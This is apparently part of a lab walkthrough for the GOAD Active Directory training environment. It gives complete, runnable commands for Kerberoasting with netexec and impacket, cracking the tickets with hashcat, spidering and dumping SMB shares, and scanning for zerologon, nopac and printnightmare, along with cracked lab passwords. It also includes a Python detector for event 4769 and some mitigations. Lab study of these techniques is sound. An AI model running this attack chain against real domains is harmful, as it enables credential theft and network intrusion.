GOAD Part 2: Domain Enumeration


Introduction

  • In the previous walkthrough we exploited various misconfigurations and obtained some valid domain user credentials.
  • With valid credentials we can enumerate much more of the domain with tools like BloodHound, and also attempt credential-based attacks such as Kerberoasting. We will explore Kerberoasting and domain enumeration using BloodHound.

Kerberoasting in the north domain

  • With our valid credentials we can attempt Kerberoasting to obtain further credential material that may grant access to more systems and data.

  • Kerberoasting targets the passwords of accounts that have a Service Principal Name (SPN) set: any authenticated domain user can request a Kerberos service ticket (TGS) for such an account, and part of that ticket is encrypted with a key derived from the service account's password.

  • We request the service tickets for these accounts and then crack the encrypted portion offline, without any further interaction with the domain controller.

  • Using netexec:

nxc ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING

  • Using impacket:

impacket-GetUserSPNs -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople

  • Either way we obtain 3 kerberoastable accounts: sansa.stark, jon.snow and sql_svc.
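Every one of these ticket requests is logged on the domain controller as a Kerberos service-ticket event (Security event ID 4769), so that is where a defender looks for this activity. The following is an added example, not part of the original walkthrough nor of NetExec or Impacket, that flags the two usual tells in constructed 4769 records: service tickets issued with RC4 (encryption type 0x17, which is what yields the crackable mode-13100 hashes) and one account requesting tickets for many distinct SPNs within a minute. Field names follow the 4769 event; the records, thresholds and account names are assumptions.

```python
"""Kerberoasting detection over Windows Security event 4769 records (added
example for this walkthrough, not GOAD/NetExec/Impacket code). Assumes the 4769
fields were already extracted (e.g. a SIEM export) into dicts; the records
below are constructed, not real lab output."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC; AES256 is 0x12

# Constructed sample: one user pulling RC4 tickets for several SPN-bearing
# accounts within seconds (the roasting pattern) plus ordinary AES traffic.
SAMPLE_4769 = [
    {"ts": "2024-05-01T10:00:01", "TargetUserName": "brandon.stark@NORTH",
     "ServiceName": "sql_svc", "TicketEncryptionType": "0x17", "IpAddress": "192.168.56.50"},
    {"ts": "2024-05-01T10:00:01", "TargetUserName": "brandon.stark@NORTH",
     "ServiceName": "jon.snow", "TicketEncryptionType": "0x17", "IpAddress": "192.168.56.50"},
    {"ts": "2024-05-01T10:00:02", "TargetUserName": "brandon.stark@NORTH",
     "ServiceName": "sansa.stark", "TicketEncryptionType": "0x17", "IpAddress": "192.168.56.50"},
    {"ts": "2024-05-01T10:05:00", "TargetUserName": "arya.stark@NORTH",
     "ServiceName": "WINTERFELL$", "TicketEncryptionType": "0x12", "IpAddress": "192.168.56.22"},
    {"ts": "2024-05-01T11:00:00", "TargetUserName": "arya.stark@NORTH",
     "ServiceName": "sql_svc", "TicketEncryptionType": "0x12", "IpAddress": "192.168.56.22"},
]

def is_user_service(service):
    """Machine accounts ($) and krbtgt are noise for this purpose; skip them."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def rc4_service_tickets(events):
    """(requester, service) for every RC4 ticket issued for a user-owned SPN."""
    return [(e["TargetUserName"], e["ServiceName"]) for e in events
            if e["TicketEncryptionType"] == RC4_HMAC and is_user_service(e["ServiceName"])]

def burst_requesters(events, window=timedelta(minutes=1), min_services=3):
    """Users that requested tickets for >= min_services distinct SPNs inside one window."""
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort as text
        if is_user_service(e["ServiceName"]):
            by_user[e["TargetUserName"]].append((datetime.fromisoformat(e["ts"]), e["ServiceName"]))
    flagged = set()
    for user, reqs in by_user.items():
        for i, (start, _) in enumerate(reqs):  # sliding window starting at each request
            if len({svc for ts, svc in reqs[i:] if ts - start <= window}) >= min_services:
                flagged.add(user)
                break
    return flagged

if __name__ == "__main__":
    print(rc4_service_tickets(SAMPLE_4769), burst_requesters(SAMPLE_4769))
```

Beyond alerting, the cheapest mitigations are long random passwords or gMSAs for SPN-bearing accounts and removing RC4 from their supported encryption types so that roasting has to crack AES tickets instead.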

Cracking with hashcat

  • Running hashcat in mode 13100 (Kerberos 5 TGS-REP, etype 23 / RC4) against the rockyou wordlist:

hashcat -m 13100 -a 0 KERBEROASTING /usr/share/wordlists/rockyou.txt.gz

  • This recovers the plaintext password of the jon.snow user:

jon.snow: iknownothing

Spidering and Dumping Shares

  • Check for shares, and the permissions jon.snow has on them, across the lab subnet:

nxc smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares

  • Dump all files from every readable share with the spider_plus module:

nxc smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M spider_plus -o DOWNLOAD_FLAG=TRUE

  • Among the dumped files are a couple of interesting ones, and one of them discloses credentials for the jeor.mormont user:

jeor.mormont: _L0ngCl@w_

Known Vulnerabilities

  • Some of these vulnerability checks require credentials to run, so we use a domain user's credentials with netexec and chain several modules in one pass:

nxc smb 192.168.56.10-23 -u 'jon.snow' -p 'iknownothing' -M zerologon -M nopac -M printnightmare -M smbghost -M ms17-010

  • The scan identifies printnightmare and nopac on winterfell.